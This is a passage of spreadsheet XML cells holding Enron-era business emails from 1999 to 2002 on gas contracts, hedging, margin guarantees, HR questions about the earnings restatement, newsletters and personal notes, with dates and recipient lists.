George Ellis_x000D_
BNP PARIBAS Commodity Futures, Inc._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
______________________________________________________________________________________________________________________________________x000D_
_x000D_
Ce message et toutes les pieces jointes (ci-apres le "message") sont etablis a l'intention exclusive de ses destinataires et sont confidentiels. Si vous recevez ce message par erreur, merci de le detruire et d'en avertir immediatement l'expediteur._x000D_
_x000D_
Toute utilisation de ce message non conforme a sa destination, toute diffusion ou toute publication, totale ou partielle, est interdite, sauf autorisation expresse._x000D_
_x000D_
L'internet ne permettant pas d'assurer l'integrite de ce message, BNP PARIBAS (et ses filiales) decline(nt) toute responsabilite au titre de ce message, dans l'hypothese ou il aurait ete modifie._x000D_
	----------------------------------------------------------------------------------_x000D_
This message and any attachments (the "message") are intended solely for the addressees and are confidential. If you receive this message in error, please delete it and immediately notify the sender._x000D_
_x000D_
Any use not in accord with its purpose, any dissemination or disclosure, either whole or partial, is prohibited except formal approval._x000D_
_x000D_
The internet can not guarantee the integrity of this message. BNP PARIBAS (and its subsidiaries) shall (will) not therefore be liable for the message if modified._x000D_
_____________________________________________________________________________________________________________________________________</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 12:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Deutsche Bank</t>
  </si>
  <si>
    <t>Tana:  Can you make a copy of the most recent draft and get on my calendar _x000D_
before Monday so that we can discuss.  Thanks.  Sara</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 13:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sgoodel@columbiaenergygroup.com', 'jwhodge@columbiaenergy.com'})</t>
  </si>
  <si>
    <t>PSNC Contract</t>
  </si>
  <si>
    <t>Did you guys execute the PSNC contract?? And if so - as CES or CEM??  Also, _x000D_
I'd like to have the offer number._x000D_
_x000D_
I think Transco is done except for PSNC._x000D_
_x000D_
Transco Stuff_x000D_
I set up several Atlanta contracts and 2 storages - all CES_x000D_
I set up 3 small Boston Gas contracts - all CES._x000D_
I set up the S Jersey capacity - CEM._x000D_
_x000D_
I think thats it.</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 11:16:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bobbi.tessandori@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'lizzette.palmer@enron.com', 'michelle.cash@enron.com'})</t>
  </si>
  <si>
    <t>RE: Immigration forms and restatement of earnings</t>
  </si>
  <si>
    <t xml:space="preserve">I'll check._x000D_
 _x000D_
"Everything comes to those who hustle while he waits." _x000D_
                                                        -Thomas Edison _x000D_
Best Regards, _x000D_
Bobbi _x000D_
International Human Resources _x000D_
tel:    713 345 2809 _x000D_
fax:   713 646 5969 _x000D_
work space: EB 3658-b _x000D_
email: bobbi.tessandori@enron.com _x000D_
-----Original Message-----_x000D_
From: Cash, Michelle _x000D_
Sent: Monday, November 19, 2001 11:43 AM_x000D_
To: Tessandori, Bobbi; Palmer, Lizzette_x000D_
Subject: RE: Immigration forms and restatement of earnings_x000D_
_x000D_
_x000D_
What does T&amp;F recommend?_x000D_
_x000D_
-----Original Message----- _x000D_
From: Tessandori, Bobbi _x000D_
Sent: Mon 11/19/2001 10:39 AM _x000D_
To: Cash, Michelle; Palmer, Lizzette _x000D_
Cc: _x000D_
Subject: RE: Immigration forms and restatement of earnings_x000D_
_x000D_
_x000D_
_x000D_
Ladies, _x000D_
_x000D_
I failed to mention that we have paperwork pending signature, waiting on a response.  If a quick response of continue "as is for now" works for me._x000D_
_x000D_
"Everything comes to those who hustle while he waits." _x000D_
                                                        -Thomas Edison _x000D_
Best Regards, _x000D_
Bobbi _x000D_
International Human Resources _x000D_
tel:    713 345 2809 _x000D_
fax:   713 646 5969 _x000D_
work space: EB 3658-b _x000D_
email: bobbi.tessandori@enron.com _x000D_
_x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Tessandori, Bobbi  _x000D_
Sent:   Monday, November 19, 2001 7:55 AM _x000D_
To:     Cash, Michelle _x000D_
Cc:     Palmer, Lizzette _x000D_
Subject:        Immigration forms and restatement of earnings _x000D_
_x000D_
Michelle, _x000D_
_x000D_
On the INS forms, there are two places which refer to: _x000D_
_x000D_
Gross Annual Income:    $100 billion _x000D_
Net Annual Income:              $979 million            _x000D_
_x000D_
_x000D_
Currently when Tindall &amp; Foster are completing the forms they use our annual report to complete these.  Would you advise if we should revised these with the recent events and include the appropriate statement/restatement with the annual report we submit?  Or continue utilizing only the annual reports and the figures held within?_x000D_
_x000D_
Thank you. _x000D_
_x000D_
"Everything comes to those who hustle while he waits." _x000D_
                                                        -Thomas Edison _x000D_
Best Regards, _x000D_
Bobbi _x000D_
International Human Resources _x000D_
tel:    713 345 2809 _x000D_
fax:   713 646 5969 _x000D_
work space: EB 3658-b _x000D_
email: bobbi.tessandori@enron.com _x000D_
</t>
  </si>
  <si>
    <t>FW: Chase Prepay</t>
  </si>
  <si>
    <t>_x000D_
Jeff -- _x000D_
_x000D_
I spoke with Lisa Bills -- she said you were going to help us on the conversion of the Chase prepay from financial to physical.  Included is a note from gas structuring regarding the contractual issues that were discussed with the physical traders.  Let me know when you have some time to discuss.  Thanks for your help and take care._x000D_
_x000D_
Michael Garberding_x000D_
Enron Americas Global Finance_x000D_
Work:  (713) 853-1864_x000D_
Fax:    (713) 646-3602_x000D_
E-mail: michael.garberding@enron.com_x000D_
 _x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Little, Kelli  _x000D_
Sent:	Tuesday, October 09, 2001 6:24 PM_x000D_
To:	Garberding, Michael_x000D_
Cc:	Moon, Eric; Boyt, Eric; Horne, Jonathan; Edmonds, Marcus; Kolle, Brian_x000D_
Subject:	Chase Prepay_x000D_
_x000D_
I spoke with the physical traders regarding the four locations for physical delivery on the Chase swaps and they expressed a few concerns that I think we should address as soon as possible._x000D_
_x000D_
While it is not a problem to spread the total volume ratably across the four locations, the Force Majeure language in past contracts has put the desk at risk during certain events which would allow the Counterparty to cut supply.  For example, in August when the hurricane presented a Force Majeure event, Chase cut gas supply to ENA, but ENA was unable to cut an equivalent amount of supply to Chase due to language in the contract.  As a result, the physical desk was forced to bear the cost of delivering more supply than it received._x000D_
_x000D_
Sandra Brawner is one of the traders with whom I spoke - she said that in the past this issue has been raised but never properly addressed.  I realize there are some cross-default issues in linking the trades - maybe we can sit down and talk about some different options to remedy the problem (or to at least make the traders feel more comfortable with the contract language)._x000D_
_x000D_
Thanks,_x000D_
Kelli_x000D_
x5-3419</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 12:45:08 -0800 (PST)</t>
  </si>
  <si>
    <t>RRSP Cont.</t>
  </si>
  <si>
    <t>Did you get the RRSP contribution I sent?_x000D_
_x000D_
I need you to make a copy of the check and send me that and a receipt._x000D_
_x000D_
Thanx_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 23:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Investigation Research</t>
  </si>
  <si>
    <t xml:space="preserve">Please be sure this is in some legal record or something so I don't have _x000D_
problems with this in the future. Thanks, Rick_x000D_
---------------------- Forwarded by Rick Buy/HOU/ECT on 01/30/2001 07:56 AM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sheila Walton                           01/29/2001 06:30 PM_x000D_
	_x000D_
_x000D_
To: Robert Howes/Enron@EnronXGate, Matthew Ahern/Enron@EnronXGate_x000D_
cc: Roberto Deleon/Enron@EnronXGate, Rick Buy/HOU/ECT@ECT _x000D_
Subject: Investigation Research_x000D_
_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Rick Buy, the Business Unit Head for the RAC group, and I logged onto his _x000D_
computer on Friday, January 26, 2001 to review information for an _x000D_
investigation on one of his employees.  We logged on at 3:01 PM and logged _x000D_
off at 3:15 PM.  Please make certain that the records reflect this _x000D_
investigative effort so Mr. Buy's name does not come up in a random search _x000D_
for accessing inappropriate websites.  If you have any questions, please call _x000D_
me at Ext 30649. Thank you. _x000D_
_x000D_
_x000D_
Sheila Walton_x000D_
HR Director_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jul 2000 01:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Margin leverage and Enron Guarantee</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, Clem!  Please see below message from Sheila Glover.  I believe that in _x000D_
the past ENE has only issued a guaranty to Paribas, ED&amp;F Mann and Bank One in _x000D_
connection with ENA's futures/special margin arrangements.  I'll be speaking _x000D_
with Paul Radous in credit.  Do you see any issues here?  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 07/31/2000 08:08 AM -----_x000D_
_x000D_
	William S Bradford_x000D_
	07/28/2000 07:31 PM_x000D_
		 _x000D_
		 To: Paul Radous/Corp/Enron@ENRON_x000D_
		 cc: Sara Shackleton/HOU/ECT@ECT_x000D_
		 Subject: Margin leverage and Enron Guarantee_x000D_
_x000D_
Paul,_x000D_
_x000D_
Can you work with Sara on this?_x000D_
_x000D_
Bill_x000D_
_x000D_
---------------------- Forwarded by William S Bradford/HOU/ECT on 07/28/2000 _x000D_
07:31 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sheila Glover                           07/28/2000 01:23 PM_x000D_
	_x000D_
_x000D_
To: William S Bradford/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT_x000D_
cc: Jeff Kinneman/HOU/ECT@ECT, John Greene/HOU/ECT@ECT, Gary _x000D_
Hickerson/HOU/ECT@ECT _x000D_
Subject: Margin leverage and Enron Guarantee_x000D_
_x000D_
Bill and Sara,_x000D_
We have been talking with Goldman Sachs, one of ECT Investment's prime _x000D_
brokers,  about ways to reduce our margin requirement and gain greater _x000D_
leverage.  Goldman suggested that we may want to consider putting an Enron _x000D_
Guaranttee in place.  _x000D_
_x000D_
We also have a prime broker agreement with Morgan Stanley.  Per the _x000D_
documentation that I have... I do not see a guarantte with Morgan Stanley._x000D_
_x000D_
1) Can you confirm that no guarantee exists with either Goldman or Morgan?_x000D_
2) Any comments regarding a Goldman guarantee by Enron Corp for ECT _x000D_
Investments Inc.?_x000D_
_x000D_
Thanks, Sheila_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 Jan 2002 09:45:34 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Returned mail: User unknown</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
-----Original Message-----_x000D_
From: Sokolov, Jason _x000D_
Sent: Tuesday, January 15, 2002 9:59 AM_x000D_
To: Kaminski, Vince J_x000D_
Subject: FW: Returned mail: User unknown_x000D_
_x000D_
_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Rzipter@aol.com [mailto:Rzipter@aol.com]_x000D_
Sent: Monday, January 14, 2002 11:02 AM_x000D_
To: Sokolov, Jason_x000D_
Subject: Fwd: Returned mail: User unknown_x000D_
_x000D_
_x000D_
Jason --_x000D_
_x000D_
can you forward my message to vince?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rudi _x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;MAILER-DAEMON@aol.com&gt;_x000D_
To: Rzipter@aol.com_x000D_
Date: Monday, January 14, 2002 4:58:51 GMT_x000D_
Subject: _x000D_
_x000D_
The original message was received at Mon, 14 Jan 2002 11:58:47 -0500 (EST)_x000D_
from root@localhost_x000D_
_x000D_
   ----- The following addresses had permanent fatal errors -----_x000D_
&lt;vince.kaminski@enron.com&gt;_x000D_
_x000D_
   ----- Transcript of session follows -----_x000D_
... while talking to mailman.enron.com.:_x000D_
&gt;&gt;&gt; RCPT To:&lt;vince.kaminski@enron.com&gt;_x000D_
&lt;&lt;&lt; 550 5.1.1 &lt;vince.kaminski@enron.com&gt;... User unknown_x000D_
550 &lt;vince.kaminski@enron.com&gt;... User unknown_x000D_
_x000D_
--------- Inline attachment follows ---------_x000D_
_x000D_
From:  &lt;Rzipter@aol.com&gt;_x000D_
To: vince.kaminski@enron.com_x000D_
Date: Monday, January 14, 2002 4:58:47 GMT_x000D_
Subject: _x000D_
_x000D_
Vince, _x000D_
_x000D_
I hope all is well with you considering ..._x000D_
_x000D_
Our baby, Addison Sterling, was born on Saturday, January 12th at 12:31 PM.  She was fairly big - 8 lbs 14 ozs and she is 20 inches long.  I've attached a link to the hospital's webite that has her picture (she is much cuter in person, of course :)_x000D_
_x000D_
We named her after Addison St which runs by Wrigley Field (Home of the Chicago Cubs) and the Pound Sterling._x000D_
_x000D_
Cami is doing well and we have returned home on Sunday night._x000D_
_x000D_
http://web.mhhs.org/nursery/babyDetails.asp?hospitalID=7&amp;search=list&amp;babyID=19650_x000D_
_x000D_
RZ_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 10:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Space on 33</t>
  </si>
  <si>
    <t xml:space="preserve">please try to find a sport for lisa , and for brent price.  thanks. _x000D_
---------------------- Forwarded by Jeffrey A Shankman/HOU/ECT on 11/06/2000 _x000D_
06:01 PM ---------------------------_x000D_
_x000D_
_x000D_
Lisa Yoho@EES_x000D_
11/06/2000 09:44 AM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Space on 33_x000D_
_x000D_
Jeff -- _x000D_
_x000D_
Is there an extra space on 33 for me?    Some of the business folks have _x000D_
asked that I move closer to them._x000D_
_x000D_
Please let me know what you think.  _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Lisa_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 05:17:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.lay@solutioncompany.com'})</t>
  </si>
  <si>
    <t>frozenset({'phil_gramm@gramm.senate.gov'})</t>
  </si>
  <si>
    <t>Some Quick Fixes for the Economy</t>
  </si>
  <si>
    <t xml:space="preserve">Senator Gramm,_x000D_
_x000D_
I expect you have already considered these:_x000D_
1.  Rebate surpluses out of the Airline trust fund that is a collection of_x000D_
taxes on airline tickets.  This in addition to stopping the taxes would_x000D_
provide needed liquidity to the airlines._x000D_
_x000D_
2.  Accelerate depreciation, perhaps to two or three years, on all capital_x000D_
goods purchased before March 31, 2001.  This would provide a very strong_x000D_
incentive for capital investment immediately._x000D_
_x000D_
3.  Defer all corporate taxes due for the next six months and make them_x000D_
payable, with interest equal to AFR, over the next two years.  This would_x000D_
effectively put the government in the position of lending to corporations at_x000D_
the federal government's borrowing rate.  The net effect over two years is_x000D_
neutral, except for potential defaults, but the fiscal impact is_x000D_
significant._x000D_
_x000D_
Good Luck, we need more public officials of your ilk up there.  Sorry that_x000D_
you won't be there much longer._x000D_
_x000D_
Regards,_x000D_
Mark_x000D_
_x000D_
Mark Lay_x000D_
713-552-9518_x000D_
_x000D_
CONFIDENTIALITY STATEMENT:_x000D_
This information is intended only for the use of the individual or_x000D_
entity to which it is addressed and may contain information that is_x000D_
confidential under applicable law.  If you are not the intended recipient,_x000D_
you are hereby notified that any dissemination of this information is_x000D_
strictly prohibited.  If you have received this information in error, please_x000D_
notify us immediately by telephone at (713) 552-9518 or by fax at (713)_x000D_
552-9403, and confirm that you have destroyed this information and any_x000D_
copies._x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Oct 2000 09:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Japanese Crude Cocktail &amp; Prompt Brent</t>
  </si>
  <si>
    <t xml:space="preserve">Vince_x000D_
Marc and I spoke about the JCC Brent relationship. I don't know enough about _x000D_
JCC to have a view if putting JCC on EOL is a good idea. Would be interested _x000D_
to know the realtionship to Brent and learn more about it. Also spoke to John _x000D_
Chismar about JCC. It sounds pretty non-liquid acc. to John._x000D_
_x000D_
Let me know if there is something we can do._x000D_
_x000D_
regards_x000D_
chris glaas    _x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Marc De La Roche                           13/10/2000 13:18_x000D_
	_x000D_
_x000D_
To: Chris Glaas/LON/ECT@ECT_x000D_
cc: Doug Leach/HOU/ECT@ECT, Kevin Kindall/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Re: Japanese Crude Cocktail &amp; Prompt Brent  _x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Chris,_x000D_
_x000D_
Thanks for the response. The comment about hedgeing JCC with Brent is right _x000D_
on if the exercise is to hedge our own LNG positions that we have tieds to _x000D_
JCC. Note that the high JCC correlation to Prompt Brent is not something that _x000D_
is obvious to non-Enron LNG-tied-to-JCC buyers. If you are an LNG-tied-to-JCC _x000D_
buyer, and you wish to hedge your purchases, wouldn't you want to be able to _x000D_
transact ona a JCC contract? My objective is to have a JCC contract on EOL, _x000D_
whereby we, Enron, take the JCC/Brent risk (which is why we asked Vince _x000D_
Kaminski's group to study the relationship and give us a hedge ratio to use). _x000D_
I'm attaching a model used to calculate JCC for Dabhol Power Co.'s Adgas and _x000D_
Oman LNG contracts. Basically what happens is that all the "raw oil" volumes _x000D_
imported into Japan and added up and the total price is divide by the total _x000D_
volume, and there is a Yen/US$ foreighn exchange component as well. That is _x000D_
JCC. It was designed by the Japanese so that they could tie their LNG imports _x000D_
to their average price of crude imports whereby the LNG would be cheaper on _x000D_
an MMBTU basis._x000D_
_x000D_
Comments?_x000D_
_x000D_
Brgds,_x000D_
_x000D_
Marc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chris Glaas_x000D_
10/13/2000 03:11 AM_x000D_
To: Marc De La Roche/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Japanese Crude Cocktail &amp; Prompt Brent  _x000D_
_x000D_
Marc_x000D_
_x000D_
regarding putting JCC on EOL I get a negative respons from our Sing office. _x000D_
It is not a very liquid market. Everyone is going the same way._x000D_
I understand there is good correlation between Brent and JCC. I know little _x000D_
about JCC, but if there is good correlation u should be able to hedge _x000D_
yourself with Brent. I need to know more about how JCC works in order to help _x000D_
u, if u require any help at all?_x000D_
_x000D_
Let me know_x000D_
chris glaas _x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Marc De La Roche                           10/11/2000 03:16 PM_x000D_
	_x000D_
_x000D_
To: Chris Glaas/LON/ECT@ECT_x000D_
cc: Doug Leach/HOU/ECT@ECT, Larry Gagliardi/Corp/Enron@Enron _x000D_
_x000D_
Subject: Japanese Crude Cocktail &amp; Prompt Brent_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Chris,_x000D_
_x000D_
Some of EGM's LNG Group's LNG is priced using a JCC-based formula. There's _x000D_
also a lot of other LNG contracts that use JCC as the pricing basis. In June _x000D_
we obtained sign-off from Vince Kaminski's group to hedge JCC using Prompt _x000D_
Brent (see the messages with the relevant hedge ratio below). Can we set up a _x000D_
contract on EOL, using the Prompt Brent-JCC hedge ratio, to hedge JCC? _x000D_
_x000D_
FYI, on a BTU conversion basis:_x000D_
_x000D_
_x000D_
Therefore, to hedge 1000 MT of LNG, a customer would need to transact on a _x000D_
hedge for 9000 BBL of JCC. Can we list a JCC swap in 9000 BBL/month _x000D_
increments?_x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
Marc_x000D_
---------------------- Forwarded by Marc De La Roche/HOU/ECT on 10/11/2000 _x000D_
08:32 AM ---------------------------_x000D_
_x000D_
_x000D_
Kevin Kindall@ENRON_x000D_
06/06/2000 03:47 PM_x000D_
To: Marc De La Roche/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: JCC &amp; Brent  _x000D_
_x000D_
Yes on both counts._x000D_
_x000D_
-Kevin K._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Marc De La Roche @ ECT                           06/06/2000 02:50 PM_x000D_
	_x000D_
_x000D_
To: Kevin Kindall/Corp/Enron@ENRON_x000D_
cc: Grant Masson/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: JCC &amp; Brent  _x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Kevin,_x000D_
_x000D_
Thanks for the information. For avoidance of doubt, please confirm:_x000D_
_x000D_
That the  relationship means that to hedge ten thousand barrels of JCC in _x000D_
September '00, I would have to enter into a financial transaction for 6706 _x000D_
barrels of Prompt (August) Brent, and;_x000D_
_x000D_
That this email constitutes your groups (Vince Kaminski's) sign-off on using _x000D_
this hedge ratio to hedge JCC and JCC-based products?_x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
Marc de La Roche_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
Kevin Kindall@ENRON_x000D_
06/06/2000 02:18 PM_x000D_
To: Marc De La Roche/HOU/ECT@ECT_x000D_
cc: Grant Masson/HOU/ECT@ECT _x000D_
Subject: Re: JCC &amp; Brent  _x000D_
_x000D_
 Good afternoon.  I have performed a review of the JCC data that you sent _x000D_
some time ago.  The study was done using several different Excel workbooks, _x000D_
and are available upon request.  Relevant charts are embedded in the _x000D_
Powerpoint attachment.  Questions/comments welcome._x000D_
_x000D_
-Kevin Kindall_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 03:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>HPL Nom for September 2, 2000</t>
  </si>
  <si>
    <t>(See attached file: hpl0902.xls)_x000D_
_x000D_
 - hpl0902.xls</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 01:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Updated Book Admin</t>
  </si>
  <si>
    <t>Please add Elizabeth Shim to the Book Admin list on the Web sight.  Her Tagg _x000D_
user name is:  ESHIM.  Thanks._x000D_
_x000D_
DG</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 15:38:19 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09 =09    Dear Don,  The White House continues to push for an economic st=_x000D_
imulus package, with time running out for Democrats and Republicans trying =_x000D_
to reach a deal.  Washington Bureau Chief Peter Cook says on Tuesday, we'll=_x000D_
 continue to watch for developments with the stimulus legislation. Some of =_x000D_
the proposals contain significant tax relief potential for energy businesse=_x000D_
s.   The Senate Commerce Committee's Consumer Affairs Subcommittee will hol=_x000D_
d its first hearing Tuesday on the collapse of Enron. Peter says like the p=_x000D_
revious hearing on the House side, Enron management is not expected to take=_x000D_
 part.  At least one Enron shareholder will participate.   When Enron wraps=_x000D_
 up its bankruptcy case, many may walk away with little or no money.  Howev=_x000D_
er, some will benefit from Enron's demise - bankruptcy attorneys.  On Tuesd=_x000D_
ay, University of Houston Law Center Director, Dean Nancy Rapaport talks ab=_x000D_
out how corporate bankruptcies equal big business for lawyers.   Continuing=_x000D_
 Enron coverage, Raymond James &amp; Associates Oil Field Service Analyst Jim R=_x000D_
ollyson is stopping by the Houston bureau on Thursday.  He'll talk about th=_x000D_
e effects of the Enron collapse on the oil field services industry during t=_x000D_
he 2:00 p.m. ET newscast.   UBS PaineWebber First Vice President of Investm=_x000D_
ents Robert Young will also join us from the Houston bureau on Tuesday.  He=_x000D_
'll bring us up to speed on how the investment community views companies cu=_x000D_
tting expenses.  Catch Young during the 10:00 a.m. ET newscast tomorrow.   =_x000D_
West Coast Correspondent Kym McNicholas will talk with California ISO Presi=_x000D_
dent Terry Winter on Tuesday about transmission constraints in the San Fran=_x000D_
cisco Bay Area and the outlook for this winter and next summer.      Closin=_x000D_
g Prices for Monday, Dec. 17, 2001    Crude: $19.15/bbl -$0.07   Unleaded: =_x000D_
$0.5407/gallon -$0.0048   Heating Oil: $0.5337/gallon -$0.0044   Gas: $2.68=_x000D_
6/mmBtu -$0.16   Keep in mind things are subject to change at a moment's no=_x000D_
tice. Occasionally guests have to cancel or change time slots.  We'll conti=_x000D_
nue to do our best to keep you updated on future interviews and events.    =_x000D_
 Be sure to watch our newscasts every business day - 9 a.m. to 5 p.m. ET, a=_x000D_
t the top of each hour.  =09 =09=09=09=09_x000D_
 =09=09=09=09=09=09 =09_x000D_
=09 =09Jay Rickerts, EnergyNewsLive.com Anchor  View today's Energy Wrap Vi=_x000D_
deo Windows Media Player: 56K  | 100K  | 300K  Real Player: 56K  | 100K  | =_x000D_
300K  (Requires Windows Media Player or Real Player )   Experience all that=_x000D_
 Williams Energy News Live has to offer!   If you are receiving this letter=_x000D_
 for the first time and wish to continue, subscribe now    To stop receivin=_x000D_
g this letter, unsubscribe now    If you are having trouble receiving this =_x000D_
e-mail, please let us know  or  call (800) WILLIAMS (800-945-5426) weekdays=_x000D_
, 7am-7pm CST.    Comments? Suggestions? Let us  know  or  call (800) WILLI=_x000D_
AMS (800-945-5426) weekdays, 7am-7pm CST.    Copyright 2001 Williams Energy=_x000D_
 News Live, LLC. All  Rights Reserved.  =09=09=09=09=09_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 01:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'kevin.mcgowan@enron.com', 'trena.mcfarland@enron.com', 'stuart.staley@enron.com', 'michael.beyer@enron.com', 'gary.hickerson@enron.com', 'ellen.su@enron.com', 'mark.ruane@enron.com', 'richard.harper@enron.com', 'joverdy@enron.com', 'shurwit@enron.com', 'pushkar.shahi@enron.com', 'anna.mehrer@enron.com', 'eric.boyt@enron.com', 'andrea.v.reed@enron.com', 'steven.kean@enron.com', 'jurgen.hess@enron.com', 'harora@enron.com', 'gmcclel@enron.com', 'aaron.armstrong@enron.com', 'martina.angelova@enron.com', 'shane.dallmann@enron.com', 'cindy.hudler@enron.com', 'darren.delage@enron.com', 'sgibner@enron.com', 'vince.kaminski@enron.com', 'kevin.ruffcorn@enron.com', 'william.stuart@enron.com', 'john.sherriff@enron.com', 'mog.heu@enron.com', 'paul.mead@enron.com', 'jennifer.fraser@enron.com', 'john.allario@enron.com', 'daniel.reck@enron.com', 'kenneth.lay@enron.com'})</t>
  </si>
  <si>
    <t>Global Markets Monitor December 8, 2000</t>
  </si>
  <si>
    <t>Please find attached this week's publication of the Global Markets Monitor _x000D_
for 08 December 2000._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Maureen Raymond-Castaneda and_x000D_
Gwyn Koepke</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 07:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dave.perrino@enron.com', 'janel.guerrero@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'john.shelk@enron.com', 'susan.mara@enron.com', 'jennifer.thome@enron.com'})</t>
  </si>
  <si>
    <t>RE: Concept Slides Reacting to Latest Push for Price Caps_x000D_
 CONFIDENTIAL</t>
  </si>
  <si>
    <t xml:space="preserve">I think that the slides are quite good.  However, there has been a lot of _x000D_
press recently in certain areas (such as Arizona and Nevada) still predicting _x000D_
shortages for this summer.  Thus, one of the slides addressing the net short _x000D_
issue may be somewhat confusing to those that are familiar with the shortage _x000D_
issue from reading press reports.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Comnes, Alan  _x000D_
Sent: Friday, June 01, 2001 10:41 AM_x000D_
To: Steffes, James; Dasovich, Jeff; Thome, Jennifer; Guerrero, Janel; _x000D_
Perrino, Dave; Kaufman, Paul; Alvarez, Ray; Shelk, John; Mara, Susan_x000D_
Subject: Concept Slides Reacting to Latest Push for Price Caps CONFIDENTIAL_x000D_
_x000D_
Yesterday (5/31) Jim Steffes, John Shelk,  and I met with Jeff Duncan, a _x000D_
staffer for Congressman Markey (D-MA).  Unfortunately, Markey's  80% forward _x000D_
contracting requirement seems to be alive and well.  He seems commited to the _x000D_
belief that forcing more 18-month deals will help customers in the current _x000D_
"sellers" market.  He specifically asked for information on the amount of _x000D_
forward contracting currently in place._x000D_
_x000D_
Please review attached slides (the word slides are very rough) and give me _x000D_
feedback as to whether the current market information would effective in _x000D_
either our DC or Califronia legislative._x000D_
_x000D_
Note that the forward price information is confidential and we need to get _x000D_
clearance before we release._x000D_
_x000D_
GAC_x000D_
 &lt;&lt; File: Western Electricity and Gas Markets Update.ppt &gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 01:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CGAS Email</t>
  </si>
  <si>
    <t>Steve Stonestreet said you have an email address for our team.  I would like _x000D_
to have that please._x000D_
_x000D_
_x000D_
I need to know what our demand charges are for some contracts that start in _x000D_
November._x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>Fri, 21 Jan 2000 01:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">I'm feeling fantastic considering I slept till 8:30 this morning.  Where were _x000D_
you last night?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Danielle Samson &lt;DanielleS@JonesGranger.com&gt; on 01/21/2000 03:35:19 AM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
How's the birthday boy feeling today?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 11:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: FRUSTRATION RELEASE MECHANISM</t>
  </si>
  <si>
    <t>That was hilarious.  I especially liked the chain saw and the flame thrower!  _x000D_
_x000D_
RR</t>
  </si>
  <si>
